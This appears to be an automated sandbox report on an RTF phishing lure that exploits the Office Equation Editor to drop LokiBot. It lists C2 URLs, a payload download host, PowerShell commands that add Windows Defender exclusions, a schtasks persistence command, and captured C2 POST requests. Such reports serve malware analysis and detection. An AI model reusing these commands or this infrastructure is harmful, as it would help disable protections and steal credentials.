Analysis
-
max time kernel
136s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
12-06-2024 06:25
Static task
static1
Behavioral task
behavioral1
Sample
Scan 94K USD.rtf
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
Scan 94K USD.rtf
Resource
win10v2004-20240508-en
General
-
Target
Scan 94K USD.rtf
-
Size
360KB
-
MD5
39990481e7a4ebc5ee5b30b8f9ecb44b
-
SHA1
48d884a85d9ef84e8726a8c825f0722878ab75d1
-
SHA256
ac4e5f6f39aebb0f686813bd7ef6b678050d0876f05bd6f30aaf7d08f2d0d7d7
-
SHA512
1c231dd4947d81b64e7e4dd526addc7d568b7e1b5049b41138073a38585c1a2cc0c54e88d4c5c40483bd29261169299e8552f3651c3e43fda98fafef0410f10c
-
SSDEEP
6144:FwAYwAYwAYwAYwAYwAYwAYwAYwAYwAPIwL:uv
Malware Config
Extracted
lokibot
http://alphabetllc.top/alpha/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2680 EQNEDT32.EXE 7 2680 EQNEDT32.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2736 powershell.exe 536 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 2512 alpha34567.scr 1256 alpha34567.scr 2024 alpha34567.scr -
Loads dropped DLL 2 IoCs
pid Process 2680 EQNEDT32.EXE 2680 EQNEDT32.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook alpha34567.scr Key opened \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook alpha34567.scr Key opened \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook alpha34567.scr -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2512 set thread context of 2024 2512 alpha34567.scr 41 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 788 schtasks.exe -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2680 EQNEDT32.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2832 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2512 alpha34567.scr 2512 alpha34567.scr 2512 alpha34567.scr 2512 alpha34567.scr 2736 powershell.exe 536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2512 alpha34567.scr Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 2024 alpha34567.scr -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2832 WINWORD.EXE 2832 WINWORD.EXE -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2680 wrote to memory of 2512 2680 EQNEDT32.EXE 29 PID 2680 wrote to memory of 2512 2680 EQNEDT32.EXE 29 PID 2680 wrote to memory of 2512 2680 EQNEDT32.EXE 29 PID 2680 wrote to memory of 2512 2680 EQNEDT32.EXE 29 PID 2832 wrote to memory of 1844 2832 WINWORD.EXE 33 PID 2832 wrote to memory of 1844 2832 WINWORD.EXE 33 PID 2832 wrote to memory of 1844 2832 WINWORD.EXE 33 PID 2832 wrote to memory of 1844 2832 WINWORD.EXE 33 PID 2512 wrote to memory of 2736 2512 alpha34567.scr 34 PID 2512 wrote to memory of 2736 2512 alpha34567.scr 34 PID 2512 wrote to memory of 2736 2512 alpha34567.scr 34 PID 2512 wrote to memory of 2736 2512 alpha34567.scr 34 PID 2512 wrote to memory of 536 2512 alpha34567.scr 36 PID 2512 wrote to memory of 536 2512 alpha34567.scr 36 PID 2512 wrote to memory of 536 2512 alpha34567.scr 36 PID 2512 wrote to memory of 536 2512 alpha34567.scr 36 PID 2512 wrote to memory of 788 2512 alpha34567.scr 38 PID 2512 wrote to memory of 788 2512 alpha34567.scr 38 PID 2512 wrote to memory of 788 2512 alpha34567.scr 38 PID 2512 wrote to memory of 788 2512 alpha34567.scr 38 PID 2512 wrote to memory of 1256 2512 alpha34567.scr 40 PID 2512 wrote to memory of 1256 2512 alpha34567.scr 40 PID 2512 wrote to memory of 1256 2512 alpha34567.scr 40 PID 2512 wrote to memory of 1256 2512 alpha34567.scr 40 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 PID 2512 wrote to memory of 2024 2512 alpha34567.scr 41 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook alpha34567.scr -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook alpha34567.scr
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Scan 94K USD.rtf"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1844
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Users\Admin\AppData\Roaming\alpha34567.scr"C:\Users\Admin\AppData\Roaming\alpha34567.scr"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\alpha34567.scr"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\eZAoJt.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eZAoJt" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5B0B.tmp"3⤵
- Creates scheduled task(s)
PID:788
-
-
C:\Users\Admin\AppData\Roaming\alpha34567.scr"C:\Users\Admin\AppData\Roaming\alpha34567.scr"3⤵
- Executes dropped EXE
PID:1256
-
-
C:\Users\Admin\AppData\Roaming\alpha34567.scr"C:\Users\Admin\AppData\Roaming\alpha34567.scr"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2024
-
-
Network
-
Remote address:8.8.8.8:53Requestdukeenergyltd.topIN AResponsedukeenergyltd.topIN A172.67.134.136dukeenergyltd.topIN A104.21.25.202
-
Remote address:172.67.134.136:443RequestGET /alphaz.scr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: dukeenergyltd.top
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/x-silverlight
Content-Length: 620552
Connection: keep-alive
Last-Modified: Wed, 12 Jun 2024 03:12:55 GMT
ETag: "97808-61aa8c234e012"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=apqeuMfTkQBfWVDGIv22XU7wzbPSZm9Wn1h7CWmHLtRPOO9r174KXuu9xh6stcMda4ULbcmZGQitWJUErjx5kqjQBHmmrTI5%2FumQ15HC3dTsEaHgBmY3TkNVxFXOo7EZ4kXcQA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8927c3142be09483-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestalphabetllc.topIN AResponsealphabetllc.topIN A104.21.79.102alphabetllc.topIN A172.67.169.238
-
Remote address:104.21.79.102:80RequestPOST /alpha/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: alphabetllc.top
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 5C35B926
Content-Length: 374
Connection: close
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.16
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5uBvEKMCQPcnPIhRSLj5IiHeXQkWq7xuHhOwUDNVm9le5oLudS8AGTegRQ11MBgdcQdNJIVjHRb%2FFZgchxzVhQB95Yo8mScKbSjLi%2BvnGQPMBIyEzt9Y4b7%2BetfJ83fWd88%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8927c366187d6400-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.79.102:80RequestPOST /alpha/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: alphabetllc.top
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 5C35B926
Content-Length: 180
Connection: close
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.16
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BS%2FYJiU%2B5nhkTzgUf6hpG2B6ZguwpFN5FQPPwAbRY59PHd9vflmDdGKBeUDGeJ9J9liRhIDfCO0jTf6Zbf3VKMVpiCV4DGt0UtsRnT30lju97LkG3W0em1ZPiSCUf4zqhU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8927c3682def6439-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.79.102:80RequestPOST /alpha/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: alphabetllc.top
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 5C35B926
Content-Length: 153
Connection: close
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.16
Status: 404 Not Found
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJKE07vY%2BVsz8iv2vs5P8U02Ck8DVB2jensQfJ5l6TOSArgO2TiH1e6niBXiAzbStHYmjzllBq%2B51BEFzfVZ%2FPXXZvXy4I5BebRR2OmciKwtUhM1UncGoMOxtr6fAKTrUa0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8927c369ed0871c2-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.79.102:80RequestPOST /alpha/five/fre.php HTTP/1.0
